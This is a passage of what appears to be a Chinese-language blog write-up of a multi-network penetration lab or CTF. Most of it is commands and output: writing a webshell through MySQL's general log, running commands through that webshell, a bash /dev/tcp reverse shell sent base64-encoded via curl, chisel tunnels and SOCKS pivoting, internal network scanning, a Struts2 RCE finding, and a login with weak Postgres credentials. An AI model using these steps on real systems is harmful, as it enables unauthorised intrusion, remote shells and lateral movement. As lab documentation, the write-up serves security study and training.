src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-191141-1024x915.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1126\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u65e5\u5fd7mysql \u5199\u5165webshell<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>show variables like '%general%';<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">1edbc9114efc.log<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set global general_log = on; \nset global general_log_file =\"\/var\/www\/html\/shell.php\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0\u90fd\u4e0d\u884c\uff0c\u7ffb\u4e86\u4e00\u4e0b\u5bb9\u5668\uff0c\u53d1\u73b0\u6743\u9650\u4e0d\u8db3\uff0c\u6709\u4e2atmp\u76ee\u5f55\u6743\u9650\u53ef\u4ee5\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193756.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193756.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1127\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193939-1024x394.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193939-1024x394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1128\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">webshell\u83b7\u53d6\u53cd\u5f39sehll<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains  curl -X POST -d \"shell=system('id');\" http:\/\/10.85.101.3\/tmp\/shell.php\n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  OK\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5efa\u7acb\u7aef\u53e3\u8f6c\u53d1<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 tp \u76848888\u7aef\u53e3\u76d1\u542cphp\u7684 \u53cd\u5f39shell\u8f93\u5165 ,\u7136\u540eclient \u548cserver\u901a\u4fe1\uff0cserver \u8f6c\u53d1\u7ed9\u81ea\u5df1\u76848888\u7aef\u53e3\uff0c\u4e5f\u5c31\u662fkali\u672c\u673a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91ccserver \u4f5c\u4e3a\u4e00\u4e2a\u6b63\u5411\u4ee3\u7406\u670d\u52a1\u5668 \u5904\u7406\u8f6c\u53d1\u51fa\u53bb\u7684\u6d41\u91cf\u548c\u7b54\u590d\u7684\u6d41\u91cf\u539f\u8def\u8fd4\u56de\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">8888:0.0.0.0:8888<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/chisel client 10.10.110.128:10130 8888:0.0.0.0:8888&amp;\n.\/chisel client 10.10.110.128:10130 8888:0.0.0.0:8888&amp;\n&#91;2] 640\nbash-5.1$ 2025\/06\/06 13:59:37 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 13:59:38 client: tun: proxy#8888=&gt;0.0.0.0:8888: Listening\n2025\/06\/06 13:59:38 client: Connected (Latency 1.022047ms)\n\n\nbash-5.1$ netstat -nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:33699        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::8888                 :::*                    LISTEN      640\/.\/chisel        \ntcp6       0      0 :::9000                 :::*                    LISTEN      20\/sh  <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5f39shell<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\/bin\/bash -i &gt;&amp; \/dev\/tcp\/10.85.101.2\/8888 0&gt;&amp;1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains  curl -X POST -d \"shell=system('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjg1LjEwMS4yLzg4ODggMD4mMQ== | base64 -d | bash');\" http:\/\/10.85.101.3\/tmp\/shell.php\n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  OK\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;504 Gateway Time-out&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;504 Gateway Time-out&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.26.3&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\n\nrlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;127.0.0.1] from (UNKNOWN) &#91;127.0.0.1] 36140\nbash: cannot set terminal process group (142): Not a tty\nbash: no job control in this shell\n1edbc9114efc:\/var\/www\/html\/tmp# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n1edbc9114efc:\/var\/www\/html\/tmp# <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f20\u6587\u4ef6<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">phpadmin 10.85.101.0 \u7f51\u6bb5\u65e0\u6cd5\u5c80\u7f51<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f7f\u7528\u8681\u5251\u8fde\u63a5webshell \u4e0a\u4f20\u6587\u4ef6<\/li>\n\n\n\n<li>\u628a\u6587\u4ef6\u4f20\u5230tp 192.168.100.2\uff0c\u5f00\u542fpython\u7b80\u6613\u670d\u52a1\u5668*<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ python3 -m http.server&amp;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e09\u4e2a\u5185\u7f51<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n<h2 class=\"wp-block-heading\">\u7f51\u7edc\u4fe1\u606f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n29: eth0@if30: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:04 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.4\/24 brd 10.85.101.255 scope global eth0\n       valid_lft forever preferred_lft forever\n31: eth1@if32: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:38:66:04 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.4\/24 brd 172.56.102.255 scope global eth1\n       valid_lft forever preferred_lft forever<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/var\/www\/html\/tmp# route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         10.85.101.1     0.0.0.0         UG    0      0        0 eth0\n10.85.101.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0\n172.56.102.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6a2a\u5411\u6e17\u900f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan -h 172.56.102.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\n(icmp) Target 172.56.102.1    is alive\n(icmp) Target 172.56.102.2    is alive\n(icmp) Target 172.56.102.3    is alive\n(icmp) Target 172.56.102.4    is alive\n&#91;*] Icmp alive hosts len is: 4\n172.56.102.4:80 open\n172.56.102.4:9000 open\n172.56.102.3:8080 open\n172.56.102.1:22 open\n172.56.102.2:5432 open\n172.56.102.3:8009 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.3:8080 open<br>172.56.102.3:8009 open<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.2:5432 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] Postgres:172.56.102.2:5432:postgres password\n\n&#91;*] WebTitle http:\/\/172.56.102.3:8080  code:200 len:90     title:$Title$\n&#91;+] PocScan http:\/\/172.56.102.3:8080 poc-yaml-struts2_045 poc1<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5efa\u7acb\u7aef\u53e3\u8f6c\u53d1<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">phpadmin 10.85.101.0 \u7f51\u6bb5\u65e0\u6cd5\u5c80\u7f51<br>\u5148\u5728tp\u4e0a\u8fd0\u884cclient \uff0c\u5728tp\u768410130\u7aef\u53e3\u4e0a\u76d1\u542c\uff0c\u7136\u540eserver \u8f6c\u53d1\u5230kali\u7684 10130\u7aef\u53e3<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ 2025\/06\/06 16:46:05 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 16:46:05 client: tun: proxy#10130=&gt;10130: Listening\n2025\/06\/06 16:46:05 client: Connected (Latency 375.204\u00b5s)\n\n\nbash-5.1$ netstat -nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:34853        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      51\/python3          \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::10130                :::*                    LISTEN      58\/.\/chisel         \ntcp6       0      0 :::8888                 :::*                    LISTEN      37\/.\/chisel         \ntcp6       0      0 :::9000                 :::*                    LISTEN      16\/sh <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u5728 phpadmin \u8fd0\u884cclient \uff0c\u5efa\u7acb\u53cd\u5411\u4ee3\u7406 \u8fc7tp \u5230kali\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/chisel client 10.85.101.2:10130 R:1090:socks&amp;\n&#91;1] 202\n3d746bf3ad56:\/tmp# 2025\/06\/06 16:49:58 client: Connecting to ws:\/\/10.85.101.2:10130\n2025\/06\/06 16:49:58 client: Connected (Latency 954.415\u00b5s)\n\n\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 11:24:12 server: Reverse tunnelling enabled\n2025\/06\/06 11:24:12 server: Fingerprint WaU49cAGmz8CWYrAQkfIALhSEsUcAoFWQnjHnhGmRl8=\n2025\/06\/06 11:24:12 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 11:45:45 server: session#1: tun: proxy#R:10800=&gt;192.168.100.2:80: Listening\n2025\/06\/06 11:52:32 server: session#2: tun: proxy#R:127.0.0.1:1080=&gt;socks: Listening\n2025\/06\/06 12:49:59 server: session#5: tun: proxy#R:127.0.0.1:1090=&gt;socks: Listening<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Struts2 rce<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains git clone https:\/\/github.com\/HatBoy\/Struts2-Scan.git \u7528\u4e0d\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011443-1-1024x510.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011443-1-1024x510.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1130\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\u7f6esocks\u4ee3\u7406<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011600-1024x352.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011600-1024x352.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1132\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011537-1024x63.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011537-1024x63.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1131\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">flag,txt<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011726-1024x327.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011726-1024x327.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1133\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u8f6c\u53d1\u7aef\u53e3<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728phpadmin \u4e0aclient \u76d1\u542c8888 \u7aef\u53e3\uff0cserver\u8f6c\u53d1\u5230kali 8888\u7aef\u53e3<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/tmp# .\/chisel client 10.85.101.2:10130 0.0.0.0:8888:0.0.0.0:8888:&amp;\n&lt;lient 10.85.101.2:10130 0.0.0.0:8888:0.0.0.0:8888:&amp;\n&#91;2] 221\n3d746bf3ad56:\/tmp# 2025\/06\/06 17:23:24 client: Connecting to ws:\/\/10.85.101.2:10130\n2025\/06\/06 17:23:24 client: tun: proxy#8888=&gt;0.0.0.0:8888: Listening\n2025\/06\/06 17:23:24 client: Connected (Latency 813.581\u00b5s)\n\n\n\n3d746bf3ad56:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n29: eth0@if30: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:04 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.4\/24 brd 10.85.101.255 scope global eth0\n       valid_lft forever preferred_lft forever\n31: eth1@if32: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:38:66:04 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.4\/24 brd 172.56.102.255 scope global eth1\n       valid_lft forever preferred_lft forever\n3d746bf3ad56:\/tmp# netstat -nltp\nnetstat -nltp\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      144\/nginx: master p\ntcp        0      0 127.0.0.11:45977        0.0.0.0:*               LISTEN      -\ntcp        0      0 :::9000                 :::*                    LISTEN      141\/php-fpm.conf)\ntcp        0      0 :::8888                 :::*                    LISTEN      221\/chisel<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5f39shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-012418-1024x312.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-012418-1024x312.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1134\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;127.0.0.1] from (UNKNOWN) &#91;127.0.0.1] 43418\nbash: cannot set terminal process group (1): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@bee75906c832:\/usr\/local\/tomcat# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n17: eth0@if18: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default \n    link\/ether 02:42:ac:38:66:03 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.3\/24 brd 172.56.102.255 scope global eth0\n       valid_lft forever preferred_lft forever\nroot@bee75906c832:\/usr\/local\/tomcat# <\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Postgres \u5f31\u53e3\u4ee4<\/h4>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.2:5432:<br>postgres\uff1apassword<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains pgcli -h 172.56.102.2 -u postgres                    <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code># \u5e38\u7528psql\u5185\u90e8\u547d\u4ee4\n\\l          # \u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\n\\c dbname   # \u5207\u6362\u5230\u6307\u5b9a\u6570\u636e\u5e93\n\\d          # \u5217\u51fa\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\n\\d table    # \u663e\u793a\u6307\u5b9a\u8868\u7684\u7ed3\u6784\n\\du         # \u5217\u51fa\u6240\u6709\u7528\u6237\u548c\u89d2\u8272\n\\q          # \u9000\u51fapsql<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains pgcli -h 172.56.102.2 -u postgres                    \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  OK\nPassword for postgres: \n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  OK\n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  OK\nServer: PostgreSQL 17.5\nVersion: 4.1.0\nHome: http:\/\/pgcli.com\npostgres&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-013653.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-013653.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1135\"\/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u7b2c\u4e00\u4e2a\u5185\u7f51 start shiro rce \u53cd\u5f39shell \u4e0b\u8f7d\u5de5\u5177 chisel + fscan +busy 